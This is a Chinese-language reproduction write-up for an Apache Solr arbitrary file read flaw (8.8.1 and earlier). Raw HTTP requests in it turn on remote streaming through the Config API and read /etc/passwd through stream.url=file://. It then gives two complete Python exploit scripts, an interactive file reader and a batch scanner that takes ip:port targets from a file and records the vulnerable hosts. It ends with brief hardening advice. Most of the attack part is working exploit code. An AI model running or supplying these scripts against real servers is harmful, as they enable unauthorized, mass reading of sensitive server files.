Apache Solr任意文件读取漏洞复现

Apache Solr 任意文件读取漏洞

一.漏洞描述

Apache Solr 存在任意文件读取漏洞:在目标未启用认证/授权的情况下,攻击者可先通过 Config API 为任意 core 开启 `enableRemoteStreaming`,再向 `debug/dump` 处理器提交 `stream.url=file://` 参数,让 Solr 读取并回显服务器本地文件(如 /etc/passwd),从而在未授权的情况下获取目标服务器敏感文件。

二.影响版本

Apache Solr <= 8.8.1(本文复现环境为 8.8.1;是否可被利用主要取决于目标是否暴露了未经认证的管理接口,而不仅仅取决于版本号)

三.漏洞复现

1.搭环境

下载Solr
https://mirrors.ukfast.co.uk/sites/ftp.apache.org/lucene/solr/8.8.1/solr-8.8.1.tgz

也可以使用 FOFA 等资产测绘平台搜索 app="Solr" 寻找目标(仅限已获得授权的测试目标)

访问目标

2.获取core的信息

访问:
http://ip:8983/solr/admin/cores?indexInfo=false&wt=json
从返回 JSON 的 status 字段中获取 core 名称,本文环境中为 acdbcategories(后续请求里的 core 名称需替换为目标实际返回的值)。

3.发送请求

使用 Burp 发送以下请求包,Host 中的 ip 要替换为目标地址。该请求通过 Config API 的 set-property 把 enableRemoteStreaming 置为 true,会修改目标 core 的配置,测试结束后应将其改回 false:

GET /solr/acdbcategories/config HTTP/1.1
Host: ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type:application/json
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 82

{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

结果:
在这里插入图片描述

4.文件读取

同样使用 Burp 发送下面的请求包,请求体中的 stream.url 指定要读取的本地文件(必须是绝对路径,如 file:///etc/passwd;后文脚本以 POST 方式发送相同参数):

GET /solr/acdbcategories/debug/dump?param=ContentStreams HTTP/1.1
Host: ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 29

stream.url=file:///etc/passwd

结果如下,成功读取到/etc/passwd中的信息:
在这里插入图片描述

5.脚本使用

import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

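def title():
    """Print the usage banner.

    The affected-version line now follows the write-up above (Solr <= 8.8.1);
    the original banner said "< 8.2.0", which does not describe this issue.
    The filename in the usage line refers to an unrelated Solr CVE and is kept
    only because that is the name the script is saved under.
    """
    print('+------------------------------------------')
    print('+  \033[34mVersion: Apache Solr <= 8.8.1           \033[0m')
    print('+  \033[36m使用格式: python3 CVE-2019-0193.py       \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  \033[0m')
    print('+  \033[36mFile   >>> 文件名称或目录                  \033[0m')
    print('+------------------------------------------')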

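def POC_1(target_url):
    """Return the name of the first core listed by the Solr CoreAdmin API.

    Queries ``/solr/admin/cores?indexInfo=false&wt=json`` and takes the first
    key of the ``status`` object. Any request error, non-2xx status, bad JSON
    or empty ``status`` is reported and terminates the script with exit
    status 1 (the original used a bare ``except`` -- which also swallowed
    KeyboardInterrupt -- and exited with 0, hiding the failure from shells).
    """
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=10)
        response.raise_for_status()
        core_name = next(iter(json.loads(response.text)["status"]))
    except (requests.RequestException, ValueError, KeyError, StopIteration, TypeError) as e:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m", e)
        sys.exit(1)
    print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
    return core_name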

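def POC_2(target_url, core_name):
    """Enable remote streaming on ``core_name`` through the Config API.

    POSTs a ``set-property`` for
    ``requestDispatcher.requestParsers.enableRemoteStreaming=true`` to
    ``/solr/<core>/config``. This changes the target core's configuration;
    set it back to ``false`` once testing is done. The "vulnerable" check is a
    heuristic (HTTP 200 whose body contains "This" -- presumably Solr's
    experimental-format notice; confirm against a real reply). Both a request
    error and a negative check exit with status 1, so the caller never goes on
    to the file-read step on a bad target (the original fell through after a
    request error and returned ``None``). Returns ``True`` on success.
    """
    vuln_url = target_url + "/solr/" + core_name + "/config"
    headers = {"Content-type": "application/json"}
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    try:
        # verify=False: the PoC deliberately ignores TLS certificate errors.
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
    except requests.RequestException as e:
        print("\033[31m[x] 请求失败 \033[0m", e)
        sys.exit(1)
    print("\033[36m[o] 正在准备文件读取...... \033[0m")
    if response.status_code == 200 and "This" in response.text:
        print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
        return True
    print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
    sys.exit(1)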

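def POC_3(target_url, core_name, File_name):
    """Read ``File_name`` from the target via the remote-streaming debug handler.

    POSTs ``stream.url=file://<File_name>`` to
    ``/solr/<core>/debug/dump?param=ContentStreams`` and prints the
    ``streams[0].stream`` field of the JSON reply. ``File_name`` must be an
    absolute path (``/etc/passwd`` becomes ``file:///etc/passwd``); a relative
    name would be taken as the URL host. The parameter is sent as form data so
    that ``&``, ``#`` or ``%`` in the path are percent-encoded rather than
    corrupting the request body (the original interpolated it raw). A reply
    that is not the expected JSON is reported instead of raising ``KeyError``.
    """
    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # A dict body is form-encoded by requests, which percent-encodes the path.
    data = {"stream.url": "file://{}".format(File_name)}
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
    except requests.RequestException as e:
        print("\033[31m[x] 请求失败 \033[0m", e)
        return
    if "No such file or directory" in response.text:
        print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
        return
    try:
        content = json.loads(response.text)["streams"][0]["stream"]
    except (ValueError, KeyError, IndexError, TypeError) as e:
        print("\033[31m[x] 响应不是预期的 JSON (HTTP {}) \033[0m".format(response.status_code), e)
        return
    print("\033[36m[o] 响应为:\n{} \033[0m".format(content))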

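if __name__ == '__main__':
    # Entry point: fetch a core name, enable remote streaming, then read files
    # interactively. A trailing "/" on the URL is stripped because the POC_*
    # helpers concatenate "/solr/..." directly; Ctrl-C / Ctrl-D end the loop
    # cleanly instead of with a traceback.
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")).strip().rstrip("/")
    core_name = POC_1(target_url)
    POC_2(target_url, core_name)
    try:
        while True:
            File_name = str(input("\033[35mFile >>> \033[0m")).strip()
            if not File_name:
                continue
            POC_3(target_url, core_name, File_name)
    except (KeyboardInterrupt, EOFError):
        print()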

运行结果:

6.批量测试目标是否存在

在脚本同级目录下新建 1.txt,写入需要测试的目标(脚本用正则只提取 `ip:port` 形式的片段,任何 http:// 前缀都会被忽略并统一补成 http://)。运行后,凡是能成功读取 /etc/passwd 的目标会被追加写入 url.txt,该文件即存在漏洞的 url 列表。

import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
a=[]  # Placeholder only: __main__ below rebinds ``a`` to the regex matches read from 1.txt.
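def title():
    """Print the usage banner for the batch checker.

    The affected-version line now follows the write-up above (Solr <= 8.8.1);
    the original banner said "< 8.2.0", which does not describe this issue.
    The File line is informational only: the batch loop always reads
    /etc/passwd.
    """
    print('+------------------------------------------')
    print('+  \033[34mVersion: Apache Solr <= 8.8.1           \033[0m')
    print('+  \033[36m使用格式: python3 poc.py               \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  \033[0m')
    print('+  \033[36mFile   >>> 文件名称或目录                  \033[0m')
    print('+------------------------------------------')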

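def POC_1(target_url):
    """Return the first core name from the CoreAdmin API, or ``1`` on failure.

    The integer sentinel ``1`` is what the batch loop in ``__main__`` checks
    (``str(core_name) == '1'``), so it is kept. Failures are caught narrowly
    (request errors, non-2xx status, bad JSON, empty ``status``) instead of a
    bare ``except`` that also swallowed KeyboardInterrupt during a long scan.
    """
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=2)
        response.raise_for_status()
        core_name = next(iter(json.loads(response.text)["status"]))
    except (requests.RequestException, ValueError, KeyError, StopIteration, TypeError) as e:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m", e)
        return 1
    print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
    return core_name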

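def POC_2(target_url, core_name):
    """Enable remote streaming on ``core_name``; return ``1`` if that fails.

    POSTs a ``set-property`` for
    ``requestDispatcher.requestParsers.enableRemoteStreaming=true`` to
    ``/solr/<core>/config``. This modifies the target core's configuration;
    revert it to ``false`` after testing. The check is heuristic (HTTP 200
    whose body contains "This"). ``1`` is returned both when the check is
    negative and when the request itself fails -- the original returned
    ``None`` on a request error, so the batch loop went on to the file-read
    step against an unreachable host. Returns ``None`` on success, as before.
    """
    vuln_url = target_url + "/solr/" + core_name + "/config"
    headers = {"Content-type": "application/json"}
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    try:
        # verify=False: the PoC deliberately ignores TLS certificate errors.
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
    except requests.RequestException as e:
        print("\033[31m[x] 请求失败 \033[0m", e)
        return 1
    print("\033[36m[o] 正在准备文件读取...... \033[0m")
    if response.status_code == 200 and "This" in response.text:
        print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
        return None
    print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
    return 1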

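def POC_3(target_url, core_name, File_name):
    """Read ``File_name`` from the target and record the host in url.txt on success.

    POSTs ``stream.url=file://<File_name>`` to
    ``/solr/<core>/debug/dump?param=ContentStreams``. The path is sent as form
    data so special characters are percent-encoded (the original interpolated
    it raw). The JSON reply is parsed first and the "root" heuristic is
    applied to the returned stream content only; the original tested the
    whole response body and wrote url.txt before parsing, so any non-stream
    reply that merely contained the substring "root" was recorded as
    vulnerable. ``File_name`` must be an absolute path.
    """
    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = {"stream.url": "file://{}".format(File_name)}
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
    except requests.RequestException as e:
        print("\033[31m[x] 请求失败 \033[0m", e)
        return
    if "No such file or directory" in response.text:
        print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
        print(response.text)
        return
    try:
        content = json.loads(response.text)["streams"][0]["stream"]
    except (ValueError, KeyError, IndexError, TypeError) as e:
        print("\033[31m[x] 响应不是预期的 JSON (HTTP {}) \033[0m".format(response.status_code), e)
        return
    # /etc/passwd always has a "root" entry; that is the only success signal used.
    if 'root' in str(content):
        print(target_url)
        with open('./url.txt', 'a', encoding='utf-8') as f:
            f.write(target_url + '\n')
        print("\033[36m[o] 响应为:\n{} \033[0m".format(content))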

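if __name__ == '__main__':
    # Batch entry point: extract ip:port targets from 1.txt and run the three
    # steps against each, skipping a target as soon as one step fails.
    title()
    with open('1.txt', 'r', encoding='utf-8') as f:
        g = f.read()
    # Raw string: "\d" inside a normal literal is an invalid escape sequence
    # (SyntaxWarning on Python 3.12+).
    a = re.findall(r'\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d+', g)
    print(a)
    for i in a:
        # The regex yields bare ip:port only, so the scheme is always added.
        target_url = 'http://' + str(i)
        print(target_url)
        core_name = POC_1(target_url)
        print(core_name)
        if str(core_name) == '1':
            continue
        b = POC_2(target_url, core_name)
        if str(b) == '1':
            continue
        File_name = '/etc/passwd'
        POC_3(target_url, core_name, File_name)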

四、修复建议

将 Solr 管理端口(默认 8983)仅对内网开放并配置访问控制策略;同时为 Solr 启用自带的认证与授权机制,避免 CoreAdmin API、Config API 等管理接口可被匿名访问;并在 solrconfig.xml 中确认 enableRemoteStreaming 保持为 false。
本文撰写时作者未找到对应的修复版本(据称官方最初将其视为未配置认证的部署问题而非漏洞);此后的 Solr 版本已对通过 Config API 修改该属性加以限制,具体以官方安全公告为准,建议升级并按上条加固。
